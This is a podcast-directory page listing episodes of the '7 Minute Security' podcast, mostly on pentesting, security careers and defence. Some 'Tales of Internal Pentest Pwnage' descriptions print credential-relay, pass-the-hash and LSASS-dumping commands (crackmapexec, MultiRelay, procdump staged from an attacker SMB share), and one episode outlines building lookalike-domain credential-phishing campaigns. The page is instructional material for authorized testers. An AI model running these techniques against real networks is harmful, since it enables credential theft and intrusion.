Cover image of 7 Minute Security
(49)
Technology
News
Tech News

7 Minute Security

Updated 7 days ago

Technology
News
Tech News
Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

iTunes Ratings

49 Ratings
Average Ratings
46
2
1
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I’m your son bye Dad love you!! 👋

iTunes Ratings

49 Ratings
Average Ratings
46
2
1
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I’m your son bye Dad love you!! 👋
Cover image of 7 Minute Security

7 Minute Security

Latest release on Jan 15, 2020

Read more

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Rank #1: 7MS #51: CEH vs. OSCP (audio)

Podcast cover
Read more

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

Apr 07 2015

7mins

Play

Rank #2: 7MS #106: A Day in the Life of an Information Security Analyst

Podcast cover
Read more

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

Oct 30 2015

10mins

Play

Rank #3: 7MS #371: Tales of Internal Pentest Pwnage - Part 4

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:

  • Having separate accounts for day-to-day operations and administrative/privileged tasks
  • Local Administrator account largely disabled across the enterprise
  • Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
  • Hard-to-crack passwords!

Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

Jul 12 2019

44mins

Play

Rank #4: 7MS #94: Learn How to Burp - Part 1

Podcast cover
Read more

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

Sep 15 2015

8mins

Play

Rank #5: 7MS #185: Vulnhub Walkthrough - Lord of the Root

May 03 2016

7mins

Play

Rank #6: 7MS #61: Why Local Admin Rights Suck (audio)

Podcast cover
Read more

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights. 7MS #61: Why Local Admin Rights Suck (audio)

May 14 2015

8mins

Play

Rank #7: 7MS #323: 7 Ways to Not Get Hacked

Podcast cover
Read more

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:

  1. Passwords
  2. 2FA/MFA
  3. Wifi (put a good password on it, don't use WEP, don't use WPS
  4. Sign up for HaveIBeenPwned
  5. Update all the things
  6. Block malware/mining with browser plugins
  7. Security awareness training

What do you think? Anything I missed or should consider swapping with another topic? Contact me!

Aug 16 2018

18mins

Play

Rank #8: 7MS #353: Tales of Internal Pentest Pwnage - Part 1

Podcast cover
Read more

Buckle up! This is one of my favorite episodes.

Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed:

Building a pentest dropbox

The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info.

Securing a pentest dropbox

What I did with my Intel NUC pentest dropbox is build a few VMs as follows:

  • Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.

  • Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).

Scoping/approaching a pentest

From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest:

  • From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.

  • Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

Pentest narrative

For one of the tests I worked on, here were some successes and challenges I had along the way:

Check out the show notes at 7MS.us as there's lots more good info there!

Mar 22 2019

42mins

Play

Rank #9: 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

Podcast cover
Read more

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks. 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

Apr 22 2015

6mins

Play

Rank #10: 7MS #284: The Quest for Critical Security Controls

Podcast cover
Read more

For a long time I've been electronically in love with the Critical Security Controls. Not familiar with 'em? The CIS site describes them as:

The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most pervasive cyber attacks. They embody the critical first steps in securing the integrity, mission, and reputation of your organization.

Cool, right? Yeah. And here are the top (first) 5 that many organizations start to tackle:

  1. Inventory of Authorized and Unauthorized Devices
  2. Inventory of Authorized and Unauthorized Software
  3. Secure Configurations for Hardware and Software
  4. Continuous Vulnerability Assessment and Remediation
  5. Controlled Use of Administrative Privileges

Google searches will show you that you can definitely buy expensive hardware/software to help you map to the CSCs, but I'm passionate about helping small businesses (and even home networks!) be more secure, so I'm on a quest to find implementable (if that's a word?) ways to put these controls in place.

I'm focusing on control #1 to start, and I've heard great things about using Fingbox (not a sponsor) to get the job done, but I'm also exploring other free options, such as nmap + some scripting magic.

More on today's episode...

Nov 02 2017

12mins

Play

Rank #11: 7MS #182: Vulnhub Walkthrough - SickOs

Apr 25 2016

9mins

Play

Rank #12: 7MS #188: Vulnhub Walkthrough - DroopyCTF

May 09 2016

11mins

Play

Rank #13: 7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Feb 29 2016

8mins

Play

Rank #14: 7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

  • What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)

  • A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX

  • This handy script runs nmap against subnets, then Eyewitness, then emails the results to you

  • Early in the engagement I'd highly recommend checking for Kerberoastable accounts

  • I really like Multirelay to help me pass hashes, like:

MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

  • Once you get a shell, run dump to dump hashes!

  • Then, use CME to pass that hash around the network!

crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth

  • Then, check out this article to use NPS and get a full-featured shell on your targets

Dec 06 2019

1hr 2mins

Play

Rank #15: 7MS #191: Vulnhub Walkthrough - Kevgir

May 17 2016

7mins

Play

Rank #16: 7MS #57: How to Review a Firewall (audio)

Podcast cover
Read more

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool. 7MS #57: How to Review a Firewall (audio)

Apr 30 2015

8mins

Play

Rank #17: 7MS #215: Installing Ubiquiti EdgeRouter X and AP - Part 1

Podcast cover
Read more

Here you can provide a detailed description about your podcast. You may wish to include: topics that will be discussed, your episode schedule, who hosts the show, any guests that have or will appear and what kind of people may enjoy your show.

Jul 21 2016

9mins

Play

Rank #18: 7MS #226: DIY $500 Pentesting Lab - Part 3

Sep 02 2016

8mins

Play

Rank #19: 7MS #176: DIY SSH Honeypot with Cowrie

Podcast cover
Read more

Apr 12 2016

8mins

Play

Rank #20: 7MS #319: Sniper and Firewalls Full of FUD

Podcast cover
Read more

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name.

And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.

Jul 20 2018

18mins

Play

7MS #396: Tales of Internal Pentest Pwnage - Part 13

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about:

python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt
cut -d ':' -f 2 combined.txt > passwords.txt
ruby /opt/pipal/pipal.rb passwords.txt > pip.txt
  • The procdump + lsass trick is still really effective (though sometimes AV gobbles it)

(See full show notes at 7ms.us!)

Jan 15 2020

53mins

Play

7MS #395: Tales of Internal Pentest Pwnage - Part 12

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test:

  • It's great to have additional goals to achieve in a network pentest outside of just "get DA"

  • PayloadsAllTheThings has a great section on Active Directory attacks

  • Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!

  • If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:

shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!"

  • When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!

  • Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!

There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!

Jan 09 2020

1hr 5mins

Play

7MS #394: DIY Pwnagotchi

Podcast cover
Read more

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Sung to the tune of "Do You Wanna Build a Snowman"

Do you wanna build a Pwnagotchi?
Even though you thought you never would?
I really hope mine doesn't ever break
It grabs wifi handshakes
It does it really good!

Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page.

At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!

Jan 03 2020

43mins

Play

7MS #393: Interview with Peter Kim

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about:

  • The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
  • How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
  • How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
  • What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
  • What are some other low-hanging fruit organizations can use to better defend their networks?
  • Do you run across some of these good defenses - like honeypots - in your engagements?
  • If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?

...and more!

Dec 26 2019

1hr 24mins

Play

7MS #392: LAPS Reloaded

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:

  • It's awesome

  • It's free

  • People still haven't heard of it when I share info about it during conference talks!

  • I've got a full write-up of how to install LAPS here

  • At a recent conference people asked me two awesome edge case questions:

    • What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?

    • What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

Dec 19 2019

24mins

Play

7MS #391: Securing Your Family During and After a Disaster - Part 3

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal."

Today, I want to answer some burning questions many of you have been asking:

  • Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)

  • How long to you get to keep rental cars before you have to replace your permanent vehicles?

  • Do you have to stay in a hotel the whole time your house is rebuilt?

  • What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?

  • What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

Dec 12 2019

49mins

Play

7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

  • What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)

  • A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX

  • This handy script runs nmap against subnets, then Eyewitness, then emails the results to you

  • Early in the engagement I'd highly recommend checking for Kerberoastable accounts

  • I really like Multirelay to help me pass hashes, like:

MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

  • Once you get a shell, run dump to dump hashes!

  • Then, use CME to pass that hash around the network!

crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth

  • Then, check out this article to use NPS and get a full-featured shell on your targets

Dec 06 2019

1hr 2mins

Play

7MS #389: Securing Your Family During and After a Disaster - Part 2

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about:

  • How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
    • New licenses
    • New ATM/credit cards
    • Rental vehicles
    • Temporary housing
  • How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect
  • What's it like working with the insurance machine? What do they help with and not help with?
  • How much does it suck to lose all your stuff? (Spoiler alert: a lot)
  • The relief (as weird as that sounds) that comes with losing all your material things

Thanks again for your support via GoFundMe

Nov 21 2019

36mins

Play

7MS #388: Securing Your Family During and After a Disaster - Part 1

Podcast cover
Read more

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this:

  • Today: Talk about "day zero" - everything that happened on the day of the fire
  • Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
  • Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.

Nov 15 2019

1hr 14mins

Play

7MS #387: How to Succeed in Business Without Really Crying - Part 7

Podcast cover
Read more

Today's episode features a few important changes to the tools and services I use to run 7MS:

Additionally, we talk about a few biz-specific challenges:

  • How do you (comfortably) talk about money with a client before the SOW hits their inbox?
  • If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

Nov 11 2019

56mins

Play

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

In today's episode we talk about:

  • Running into angry system admins (that are either too fired up or not fired up enough)
  • Being wrong without being ashamed
  • When is it necessary to make too much noice to get caught during an engagement?
  • What are the top 5 tools you run on every engagement?
  • How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
  • How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
  • How do you deal with colleagues who take findings as their own when they talk with management?
  • How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
  • What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
  • How could a fresh grad get into a red team job?
  • What do recruiters look for candidates seeking red team positions?
  • If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
  • What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
  • What's your favorite red team horror story?

Nov 01 2019

1hr 24mins

Play

7MS #385: A Peek into the 7MS Mail Bag

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to).

Links to things discussed this episode:

Wireless pentest certs:

Good/free pentest training options:

Free logging/alerting solutions for SMBs:

Oct 22 2019

44mins

Play

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns

Podcast cover
Read more

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

  • Consider this list of top 9 phishing simulators.
  • Check out GoPhish!
  • Then spin up a free tier Kali AWS box
  • Follow the instructions to install GoPhish and get it running on your AWS box
  • Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
  • Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
  • Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us):
  • Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
  • Have fun!!!

Oct 12 2019

50mins

Play

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

(more on today's episode show notes)

Oct 01 2019

30mins

Play

7MS #382: Tales of Internal Network Pentest Pwnage - Part 9

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network.

This was an especially interesting one because the client had a lot of great security defenses in place, including:

  • Strong user passwords
  • A SIEM solution that appeared to be doing a great job

We did some looking for pwnage opportunities such as:

  • Systems missing EternalBlue patch
  • Systems missing BlueKeep patch

What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes.

Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

Sep 24 2019

34mins

Play

7MS #381: DIY $500 Pentesting Lab Deployment Tips

Podcast cover
Read more

For Windows VMs

  • Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
  • Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):
powershell Install-PackageProvider -Name NuGet -Force
powershell Install-Module PSWindowsUpdate -force
powershell Set-ExecutionPolicy bypass
powershell Import-Module PSWindowsUpdate
powershell Get-WindowsUpdate
powershell Install-WindowsUpdates -AcceptAll -AutoReboot
  • To turn on remote desktop:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
  • To set the firewall to allow RDP:
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
  • To stop the freakin' Windows hosts from going to sleep:
powercfg.exe -change -standby-timeout-ac 0
  • To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
setup64.exe /s /v "/qn reboot=r"
  • To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"

For Linux VMs

  • Get SSH keys regenerated and install/run openssh server:
apt install openssh-server -y
mkdir /etc/ssh/default_keys
mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
dpkg-reconfigure openssh-server
systemctl enable ssh.service
systemctl start ssh.service

Next user group meeting September 30!

Sep 18 2019

38mins

Play

7MS #380: Tales of Internal Network Pentest Pwnage - Part 8

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a continuation of episode #379, where we:

  • Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
  • Sucked our nmap scans into Eyewitness
  • Captured and cracked some creds with Paperspace
  • Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

Today, the adventure continues with:

  • Checking the environment for CVE-2019-1040
  • Picking apart the privileges on my "pseudo domain admin" account
  • Making a startling discovery about how almost all corp passwords were stored

Enjoy!

Sep 05 2019

28mins

Play

7MS #379: Tales of Internal Network Pentest Pwnage - Part 7

Podcast cover
Read more

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

  • Review of setting up your DIY pentest dropbox
  • Choosing the right hardware (I'm partial to this NUC)
  • Running Responder to catch creds
  • Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
  • Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
  • Running Sharphound to get a map of the AD environment
  • Cracking creds with Paperspace
  • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

Aug 30 2019

43mins

Play

7MS #378: Interview with Zane West of Proficio

Podcast cover
Read more

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about:

  • How important is it to have an IT background before you jump into security?
  • How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
  • Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
  • Why in the world does it take twenty seven people to run a SOC?!
  • When should an organization consider engaging an MSSP to help them with their security needs?
  • What if your MSP also provides MSSP services? Is that a good or bad thing?
  • What are some tips for successfully deploying a SIEM?
  • What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

Aug 22 2019

54mins

Play

7MS #377: DIY Pentest Dropbox Tips

Podcast cover
Read more

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series.

Here are some of the pain points I cover today:

  • Turn the firewall off
    Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.

  • Disable Windows Defender
    Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.

  • Disable power sleep settings
    To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled

  • Create a second disk on the Windows management VM and install BitLocker to Go

Check out today's show notes at 7ms.us for more info!

Aug 16 2019

28mins

Play

iTunes Ratings

49 Ratings
Average Ratings
46
2
1
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I’m your son bye Dad love you!! 👋